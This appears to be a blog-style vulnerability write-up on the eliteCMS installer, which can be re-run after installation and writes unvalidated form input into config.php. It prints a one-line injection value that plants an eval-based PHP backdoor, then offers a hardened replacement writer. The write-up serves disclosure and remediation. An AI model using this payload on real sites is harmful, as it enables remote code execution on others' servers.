After the eliteCMS installer finishes, it is not locked, so an attacker can open the installer URL again and re-run the installation.

A second vulnerability: the installer can write a one-line PHP backdoor straight into admin/includes/config.php.

Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values are interpolated, unescaped, into the PHP source being generated.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The generated source is written to the config file as-is.
    $writer = fopen($file, 'w');
...

Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are stored without any validation. If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

then a one-line backdoor is written into /admin/includes/config.php.
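Both problems (no install lock, and raw interpolation of user input into generated PHP source) can be fixed in the config writer itself. The following is an added example written for this post, not eliteCMS's own code; the lock-file path, the helper names and the validation patterns are assumptions.

```php
<?php
// Hardened config writer (example, not eliteCMS code). Assumed names:
// validate_setting(), build_config(), write_config(), and the lock file path.

// Reject anything that is not a plausible value for the setting. The break-out
// shown above (quote, "?>", new "<?php") never matches these patterns.
function validate_setting(string $name, string $value): string {
    $patterns = [
        'DB_SERVER' => '/^[A-Za-z0-9._:-]{1,255}$/',
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.-]{1,64}$/',
        'DB_PASS'   => '/^[\x20-\x7E]{0,128}$/', // printable ASCII only
    ];
    if (!isset($patterns[$name]) || !preg_match($patterns[$name], $value)) {
        throw new InvalidArgumentException("Invalid value for $name");
    }
    return $value;
}

// Generate only the define() lines; the DB connection boilerplate is unchanged.
function build_config(array $settings): string {
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $value = validate_setting($key, (string) ($settings[$key] ?? ''));
        // var_export() emits a correctly quoted and escaped PHP string literal,
        // so quotes, backslashes or "?>" in a value stay inside the literal.
        $out .= sprintf("define(%s, %s);\n",
                        var_export($key, true), var_export($value, true));
    }
    return $out;
}

function write_config(string $file, string $lockFile, array $settings): void {
    // Refuse to run once installation has completed: this closes the
    // "revisit the installer URL" problem described above.
    if (file_exists($lockFile)) {
        throw new RuntimeException('Installation already completed');
    }
    $tmp = $file . '.tmp';
    if (file_put_contents($tmp, build_config($settings), LOCK_EX) === false
        || !rename($tmp, $file)) {
        throw new RuntimeException('Could not write config file');
    }
    // Create the lock last, after the config is in place.
    file_put_contents($lockFile, date('c'));
}

// Constructed sample call; $_POST values would be passed in the same way.
write_config('../admin/includes/config.php', '../admin/includes/install.lock',
             ['DB_SERVER' => 'localhost', 'DB_NAME' => 'elitecms',
              'DB_USER' => 'elite', 'DB_PASS' => 'p"a\'ss?>word']);
```

With this writer, the password value above lands in config.php as a single-quoted literal with the quote escaped, and a second visit to the installer stops at the lock check.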